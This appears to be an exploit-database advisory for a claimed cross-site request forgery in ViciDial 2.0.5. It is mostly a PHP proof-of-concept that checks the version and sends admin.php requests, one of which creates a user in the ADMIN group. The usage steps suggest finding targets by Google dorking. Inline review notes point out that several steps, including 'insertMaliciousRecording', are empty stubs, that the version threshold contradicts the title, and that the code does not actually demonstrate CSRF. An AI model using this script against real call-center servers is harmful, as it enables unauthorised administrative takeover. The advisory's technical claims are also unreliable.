Headline
ViciDial 2.0.5 Cross Site Request Forgery
ViciDial version 2.0.5 suffers from a cross site request forgery vulnerability.
=============================================================================================================================================| # Title : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code add new admin .[+] Line 172 set your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?php /* Proof-of-concept class from the advisory above. check() fetches /agc/vicidial.php, extracts a "VERSION:" marker from the response and compares it with '2.14-917a'; exploit() then drives a sequence of /vicidial/admin.php requests (ADD=3, 4A, 21, 41, 211, 61) using the HTTP Basic credentials passed to the constructor. NOTE(review): the '2.14-917a' threshold in check() does not match the 2.0.5 release named in the title — confirm the affected range with the vendor before trusting the Vulnerable/Safe verdict. NOTE(review): six of the chained steps (startService, updateSystemSettings, fetchPhoneCredentials, agentPortalAuthentication, insertMaliciousRecording, waitForCronJob) are empty stubs, and every request is authenticated with supplied credentials rather than riding a victim's browser session, so this listing documents the admin.php request shapes rather than demonstrating the cross-site trigger itself; the CSRF claim rests on admin.php accepting these state-changing requests without an anti-forgery token, which is not shown here. Defensive takeaways: because the PoC authenticates with HTTP Basic, which browsers replay automatically, a per-request anti-forgery token on admin.php forms and Origin/Referer validation are the mitigations that matter, and admin.php requests carrying ADD=4A with user_group=ADMIN from an unexpected Origin/Referer are worth alerting on. */ class VICIdialExploit { /* Target base URL, credentials, and the pre-built Authorization header value. */ private $username; private $password; private $targetUri; private $headers; /* Stores the target details and encodes username:password for HTTP Basic auth. */ public function __construct($username, $password, $targetUri) { $this->username = $username; $this->password = $password; $this->targetUri = $targetUri; $this->headers = array( 'Authorization' => 'Basic ' . base64_encode($username . ':' . $password) ); } /* Version probe. Returns 'Unknown' when the request or the VERSION extraction fails, 'Vulnerable' when the extracted text sorts at or below '2.14-917a' under version_compare(), 'Safe' otherwise. NOTE(review): the text compared is the whole regex match (prefix included), so treat the verdict as indicative only. */ public function check() { $response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php'); if ($response['code'] != 200) { return 'Unknown'; } $version_info = $this->extractVersion($response['body']); if (!$version_info) { return 'Unknown'; } $current_version = $this->compareVersion($version_info, '2.14-917a'); return ($current_version <= 0) ? 'Vulnerable' : 'Safe'; } /* Looks for a "VERSION: x.y-zzz" marker in the page HTML; returns the full matched text, or null if absent. */ private function extractVersion($html) { preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches); return isset($matches[0]) ? 
$matches[0] : null; } /* Thin wrapper around version_compare(). */ private function compareVersion($current, $vulnerable) { return version_compare($current, $vulnerable); } /* Runs the chained sequence from the advisory in order. The stubbed steps return nothing, so $phoneCreds is null by the time it is indexed. */ public function exploit() { $this->startService(); $this->authenticateAdmin(); $this->updateUserSettings(); $this->updateSystemSettings(); $campaignData = $this->createDummyCampaign(); $this->updateCampaignSettings($campaignData['id']); $this->createDummyList($campaignData['list_name'], $campaignData['id']); $phoneCreds = $this->fetchPhoneCredentials(); $this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']); $this->insertMaliciousRecording($phoneCreds['recording_extension']); $this->deleteDummyCampaign($campaignData['id']); $this->waitForCronJob(); } /* Stub: no implementation in this listing. */ private function startService() { /* Starting HTTP service logic */ } /* Issues one HTTP request through file_get_contents() with a stream context; $body, when given, is form-encoded into the request content regardless of $method. Returns the first response header line as 'code' and the raw body. NOTE(review): no timeout, and the false return from a failed request is not checked. */ private function sendRequest($method, $url, $body = null) { $options = array( 'http' => array( 'method' => $method, 'header' => implode("\r\n", $this->headers) ) ); if ($body) { $options['http']['content'] = http_build_query($body); } $context = stream_context_create($options); $result = file_get_contents($url, false, $context); return array( 'code' => $http_response_header[0], 'body' => $result ); } /* GET admin.php with ADD=3 and the admin username; throws unless the first header line compares equal to 200. */ private function authenticateAdmin() { $response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username)); if ($response['code'] != 200) { throw new Exception('Failed to authenticate with credentials.'); } echo 'Authenticated successfully as user ' . $this->username; } /* POST admin.php ADD=4A — the user-creation request behind the "Add Admin" title: user_group is set to 'ADMIN', with filler names from Faker. */ private function updateUserSettings() { $faker = new Faker\Generator(); $userSettings = array( 'ADD' => '4A', 'user' => $this->username, 'pass' => $this->password, 'full_name' => $faker->name, 'user_group' => 'ADMIN', 'phone_login' => $faker->userName, 'phone_pass' => $faker->password, 'active' => 'Y', 'vicidial_recording' => '1' ); $this->sendRequest('POST', $this->targetUri . 
'/vicidial/admin.php', $userSettings); echo 'Updated user settings'; } /* Stub: no implementation in this listing. */ private function updateSystemSettings() { /* Fetching system settings logic and making changes */ } /* POST admin.php ADD=21 with a rand()-generated campaign id; returns the id and names reused by the later steps. */ private function createDummyCampaign() { $faker = new Faker\Generator(); $campaignId = rand(100000, 999999); $listId = $campaignId + 1; $campaignName = $faker->company; $campaignSettings = array( 'ADD' => '21', 'campaign_id' => $campaignId, 'campaign_name' => $campaignName, 'user_group' => '---ALL---', 'active' => 'Y' ); $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings); echo 'Created dummy campaign ' . $campaignName; return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId); } /* POST admin.php ADD=41 to activate the campaign with auto_dial_level 1. */ private function updateCampaignSettings($campaignId) { $campaignSettings = array( 'ADD' => '41', 'campaign_id' => $campaignId, 'active' => 'Y', 'auto_dial_level' => '1' ); $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings); echo 'Updated dummy campaign settings'; } /* POST admin.php ADD=211 to attach a list to the campaign. */ private function createDummyList($listName, $campaignId) { $listSettings = array( 'ADD' => '211', 'list_name' => $listName, 'campaign_id' => $campaignId, 'active' => 'Y' ); $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings); echo 'Created dummy list ' . $listName; } /* Stub: no implementation in this listing. */ private function fetchPhoneCredentials() { /* Fetching phone credentials logic */ } /* Stub: no implementation in this listing. */ private function agentPortalAuthentication($extension, $password, $campaignId) { /* Agent portal authentication logic */ } /* Stub: no implementation in this listing. */ private function insertMaliciousRecording($recordingExtension) { /* Inserting malicious recording logic */ } /* Cleanup: GET admin.php ADD=61 with CoNfIrM=YES for the dummy campaign. */ private function deleteDummyCampaign($campaignId) { $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES')); echo 'Deleted dummy campaign ' . 
$campaignId; } /* Stub: no implementation in this listing. */ private function waitForCronJob() { /* Waiting for cron job logic */ }} /* Usage example: */ $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');$exploit->check();$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================